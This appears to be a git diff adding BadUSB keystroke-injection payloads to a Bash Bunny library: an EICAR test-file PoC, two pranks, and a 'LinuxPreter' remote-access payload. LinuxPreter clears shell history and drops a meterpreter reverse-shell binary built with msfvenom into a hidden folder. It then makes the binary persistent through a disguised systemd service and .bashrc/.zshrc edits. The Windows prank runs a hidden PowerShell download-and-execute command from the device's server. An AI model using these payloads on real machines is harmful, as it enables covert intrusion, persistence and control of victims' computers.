Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/intel.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/intel.sh
Q ENTER
Q STRING /tmp/./intel.sh
Q ENTER
Q DELAY 25000
Q STRING rm /tmp/intel.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

2
payloads/library/poc/MacOS_EICAR/eicar.sh Normal file
View File

@ -0,0 +1,2 @@
#!/bin/bash
echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\ >Desktop/Malware.txt

32
payloads/library/poc/MacOS_EICAR/payload.txt Normal file
View File

@ -0,0 +1,32 @@
#!/bin/bash
# Title: MacOS_EICAR
# Description: Bad USB PoC for MacOS.
# Author: Ciph3rtxt
# Category: PoC
# Target: MacOS
# Attackmodes: HID STORAGE
# Setup
LED R
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
path=/Volumes/BashBunny/payloads/$SWITCH_POSITION
# Execute Attack
LED R
DELAY 200
RUN OSX terminal
Q DELAY 2000
Q STRING cd
Q ENTER
Q DELAY 200
Q STRING chmod a+x $path/eicar.sh
Q ENTER
Q DELAY 200
Q STRING $path/eicar.sh
Q ENTER
Q DELAY 200
# Complete
LED G

19
payloads/library/poc/MacOS_EICAR/readme.md Normal file
View File

@ -0,0 +1,19 @@
# MacOS EICAR PoC
Author: Ciph3rtxt
## Category:
PoC
## Description:
Generates EICAR file to simulate USB (physical access) malware attack.
## Status:
|LED|STATUS|
|-|-|
|Red|Attack|
|Green|Complete|

2
payloads/library/prank/UnifiedRickRoll/payload.txt
View File

@ -13,7 +13,7 @@ Q DELAY 1000
Q GUI n
Q DELAY 1000
Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while test \$hi == \'0\'\; do if [ \$ho == $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown
Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while [ \$hi = \'0\' ]\; do if [ \$ho = $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown
# close up shop
Q DELAY 1000

37
payloads/library/prank/Win_PoSh_HiThere/payload.txt Normal file
View File

@ -0,0 +1,37 @@
#!/bin/bash
# Title: Hi There
# Description: Creates a hidden link file that override the ctrl+c functionality.
# So, when the user press ctrl+c it lunches the first sign-in animation.
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
# Props: v3ded, Hexacorn and Audibleblink (Python Server)
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
QUACK DELAY 500
QUACK CTRL c
LED FINISH

33
payloads/library/prank/Win_PoSh_HiThere/readme.md Normal file
View File

@ -0,0 +1,33 @@
# Hi There
- Author: Cribbit
- Version: 1.0
- Tested on: Windows 10 (Powershell 5.1+)
- Category: Pranks
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
- Props: v3ded, Hexacorn and Audibleblink (Python Server)
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Creates a hidden link file that override the ctrl+c functionality.
So, when the user press ctrl+c it lunches the first sign-in animation.
## Notes
to kill the animation, you need to open task manger and look for "First Sign-in Animation".
For extra evilness add `/explorer` to the `$shortcut.Arguments` line in the script file. Then you can't switch programs or kill it.
## More information
<https://v3ded.github.io/redteam/abusing-lnk-features-for-initial-access-and-persistence>
<https://www.hexacorn.com/blog/2022/01/16/windows-installation-animation/>
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |

19
payloads/library/prank/Win_PoSh_HiThere/s Normal file
View File

@ -0,0 +1,19 @@
$path = "$([Environment]::GetFolderPath('Desktop'))\readme.lnk"
$wshell = New-Object -ComObject Wscript.Shell
$shortcut = $wshell.CreateShortcut($path)
$shortcut.IconLocation = "C:\Windows\System32\shell32.dll,70"
$shortcut.TargetPath = "C:\Windows\System32\oobe\FirstLogonAnim.exe"
$shortcut.Arguments = "/RunFirstLogonAnim"
$shortcut.WorkingDirectory = "C:"
$shortcut.HotKey = "CTRL+C"
$shortcut.Description = "Contain very important information"
$shortcut.WindowStyle = 7
# 7 = Minimized window
# 3 = Maximized window
# 1 = Normal window
$shortcut.Save()
(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks)

36
payloads/library/remote_access/LinuxPreter/README.md Normal file
View File

@ -0,0 +1,36 @@
## About:
* Title: LinuxPreter
* Description: Injects meterpreter payload and makes it persistent.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Remote Access
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## LinuxPreter injects meterpreter payload, make it persistent and triggers payload on launch of terminal/shell.
### Workflow:
* Keeping tracks clear by preventing storage of history.
* Fetching BashBunny's block device and mounting it.
* Transfering payload script and payload itself.
* Deleting scripts from victims machine and unmounting bunny.
### Create Meterpreter payload:
* ```msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=<PORT NO> -f elf -o sysHandle.bin```
* NOTE: Only change IP address and Port number in the above command.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| sysHandle.bin | /tools/ |
#### Support me if you like my work:
* https://twitter.com/drapl0n

12
payloads/library/remote_access/LinuxPreter/payload.sh Normal file
View File

@ -0,0 +1,12 @@
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
mkdir /var/tmp/.system
cp -r $mntt/tools/sysHandle.bin /var/tmp/.system
chmod +x /var/tmp/.system/sysHandle.bin
mkdir -p ~/.config/systemd/user/
systemctl --user start systemPer.service
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemPer.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

56
payloads/library/remote_access/LinuxPreter/payload.txt Normal file
View File

@ -0,0 +1,56 @@
# Title: LinuxPreter
# Description: Injects meterpreter payload and makes it persistent.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Remote Access
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 1000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH